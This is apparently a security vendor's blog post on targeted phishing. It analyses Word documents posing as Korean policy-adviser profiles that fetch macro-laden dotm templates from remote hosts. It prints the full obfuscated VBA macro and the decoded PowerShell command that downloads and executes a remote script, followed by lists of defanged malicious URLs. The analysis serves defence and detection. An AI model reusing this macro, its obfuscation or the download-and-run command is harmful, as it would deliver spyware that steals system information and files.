APT Attack Attempts Using Word Documents Targeting Specific Individuals

The ASEC analysis team confirmed that the malware with the same format of malicious word documents introduced in the post “Malicious Word Documents Pretending ‘Korea Association for Political and Diplomatic History’ and ‘Policy Advisory Member Profile’ Being Distributed” is still being distributed. Like the malicious word documents introduced in previous cases, the recently discovered word files also download the dotm file with the malicious macro through the external link. The filenames and external URLs confirmed are as follows.

Date DiscoveredFilenameExternal URL
July 3rd[Office of the Inter-Korean Dialogue Policy Advisory Member] Profile Template.docxhxxp://jupit.getenjoyment.net/Package/2006/relationships/InterKoreanSummit.dotm
July 6th00225 Conversation between Korean members of the National Assembly and American Members of Congress ***.docxhxxp://modri.myartsonline.com/officeDocument/2006/relationships/BIO. dotm
July 9thProfessor *** BIO.docxhxxp://visul.myartsonline.com/officeDocument/2006/relationships/BIO. dotm
July 12thProfessor ***-BIO.docxhxxp://ccav.myartsonline.com/officeDocument/2006/relationships/BIO. dotm
July 15thBIO Template.docxhxxp://tbear.mypressonline.com/officeDocument/2006/relationships/BIO.dotm
Table 1. Distributed filenames and external URLs

Figure 1. External link within BIO Template.docx file

The downloaded dotm files all include a macro that is the same type as the one previously discovered. Below is the malicious macro within the dotm file downloaded from the external link (hxxp://tbear.mypressonline.com/officeDocument/2006/relationships/BIO.dotm) of BIO Template.docx.

Private Sub Document_Open()
 eifhhdfasfiedf
 End Sub
  
 Function eifhhdfasfiedf()
 Set djfeihfidkasljf = CreateObject("Shell.Application")
 Dim dfgdfjiejfjdshaj As String
 fjdjkasf = "tlsiajdsladkf"
 fjdjkasf = Left(fjdjkasf, 5)
 dfgdfjiejfjdshaj = "tlsiaptlsiaotlsiawtlsiaetlsiartlsiastlsiahtlsiaetlsialtlsialtlsia.tlsiaetlsiaxtlsiaetlsia"
 dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, fjdjkasf, "")
 hdfksallasjkdlaf = "tlsia[tlsiastlsiattlsiartlsiaitlsiantlsiagtlsia]tlsia$tlsiaatlsia=tlsia{tlsia(tlsiaNtlsiaetlsiawtlsia-tlsiaOtlsiabtlsiajtlsiaetlsiactlsiattlsia "
 hdfksallasjkdlaf = Replace(hdfksallasjkdlaf, fjdjkasf, "")
 ndkflajdkfjskdjfl = "tlsiaNtlsiaetlsiattlsia.tlsiaWtlsiaetlsiabtlsiaCtlsialtlsiaitlsiaetlsiantlsiattlsia)tlsia.tlsiaDotlsiantlsiagtlsia"
 ndkflajdkfjskdjfl = Replace(ndkflajdkfjskdjfl, fjdjkasf, "")
 salfnxkfdlsjafkj = "('htlsiattlsiattlsiaptlsia:tlsia/tlsia/tlsiattlsiabtlsiaetlsiaatlsiartlsia.tlsiamtlsiaytlsiaptlsiartlsiaetlsiastlsiastlsiaotlsiantlsialtlsiaitlsiantlsiaetlsia.tlsiactlsiaotlsiamtlsia/tlsiactlsiaitlsia/tlsiamotlsia.tlsiattlsiaxtlsiat')"
 salfnxkfdlsjafkj = Replace(salfnxkfdlsjafkj, fjdjkasf, "")
 sjdfkjaslalsfial = "tlsia}tlsia;tlsia$tlsiabtlsia=tlsia$tlsiaatlsia.tlsiaitlsiantlsiastlsiaetlsiartlsiattlsia(tlsia2tlsia9tlsia,tlsia'"
 sjdfkjaslalsfial = Replace(sjdfkjaslalsfial, fjdjkasf, "")
 aksfkjaskjfksnkf = "tlsiatlsiawtlsiantlsialtlsiaotlsiaatlsiadtlsiastlsiattlsiartlsiaitlsia'tlsia)tlsia;tlsia$tlsiactlsia=tlsiaitlsia"
 aksfkjaskjfksnkf = Replace(aksfkjaskjfksnkf, fjdjkasf, "")
 sdfewjdhsajkfhjdf = "etlsiaxtlsia tlsia$tlsiabtlsia;tlsiaitlsiaetlsiaxtlsia tlsia$tlsiactlsia"
 sdfewjdhsajkfhjdf = Replace(sdfewjdhsajkfhjdf, fjdjkasf, "")
 skdjfksjkfjkdsfj = hdfksallasjkdlaf + ndkflajdkfjskdjfl + salfnxkfdlsjafkj + sjdfkjaslalsfial + aksfkjaskjfksnkf + sdfewjdhsajkfhjdf
  
 djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, skdjfksjkfjkdsfj, "", "open", 0
  
 End Function

Code 1. Macro code within BIO.dotm file

When the macro is executed, the powershell command below is run, downloading and running the script in hxxp://tbear.mypressonline.com/ci/mo.txt.

“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” [string]$a={(New-Object Net.WebClient).Dong(‘hxxp://tbear.mypressonline.com/ci/mo.txt’)};$b=$a.insert(29,’wnloadstri’);$c=iex $b;iex $c
Table 2. Powershell command

Figure 2. Malicious script from hxxp://tbear.mypressonline.com/ci/mo.txt

The malicious script has the same format as the one explained in the previous post except for the C2 URL, and performs behaviors such as collecting user information and downloading additional files as shown below.

  • Downloads additional malicious files
  • Collects list of recent files
  • Collects SystemInfo
  • Collects tasklist
  • Uploads collected files

In addition, there were many URLs downloading malicious dotm shown above and those with malicious scripts.

hxxp://btige.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
hxxp://tbear.mypressonline.com/officeDocument/2006/relationships/BIO.dotm
hxxp://stair.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
hxxp://ccav.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
hxxp://visul.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
hxxp://modri.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
hxxp://ranso.myartsonline.com/Package/2006/relationships/InterKoreanSummit.dotm
hxxp://lieon.mypressonline.com/Package/2006/relationships/InterKoreanSummit.dotm
hxxp://chels.mypressonline.com/Package/2006/relationships/InterKoreanSummit.dotm
hxxp://warcr.onlinewebshop.net/Package/2006/relationships/InterKoreanSummit.dotm
hxxp://jupit.getenjoyment.net/Package/2006/relationships/InterKoreanSummit.dotm
hxxp://ripzi.getenjoyment.net/Package/2006/relationships/InterKoreanSummit.dotm
Table 3. Additionally found URLs downloading dotm

hxxp://stair.myartsonline.com/ya/ng.txt
hxxp://lovels.myartsonline.com/ys/ha.txt
hxxp://lovel.myartsonline.com/le/ej.txt
hxxp://visul.myartsonline.com/yk/yo.txt
hxxp://vbqwer.mypressonline.com/test.log
hxxp://tbear.mypressonline.com/test.txt
hxxp://obser.mygamesonline.org/nw.txt
hxxp://modri.myartsonline.com/gu/nw.txt
hxxp://warcr.onlinewebshop.net/le/eh.txt
hxxp://stair.atwebpages.com/ne/la.txt
hxxp://giruz.atwebpages.com/sw/cu.txt
hxxp://benze.atwebpages.com/ki/mc.txt
hxxp://likel.atwebpages.com/bu/ma.txt
hxxp://rster.atwebpages.com/an/ce.txt
hxxp://mantc.getenjoyment.net/ya/ng.txt
Table 4. URLs with additionally discovered malicious scripts

As targeted malware disguised as normal word documents are still being distributed, users need to take extra caution. They should refrain from opening files with unknown sources and running macros included in document files. Additionally, as the malware performs the feature of changing the macro security settings, users should periodically check the security settings, and maintain it as high.

AhnLab’s anti-malware product, V3, detects and blocks the types of files above using the aliases below.

[File Detection]

  • Downloader/XML.External
  • Downloader/DOC.Agent

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Categories:Malware Information

Tagged as:,

5 1 vote
Article Rating
guest
0 Comments
Inline Feedbacks
View all comments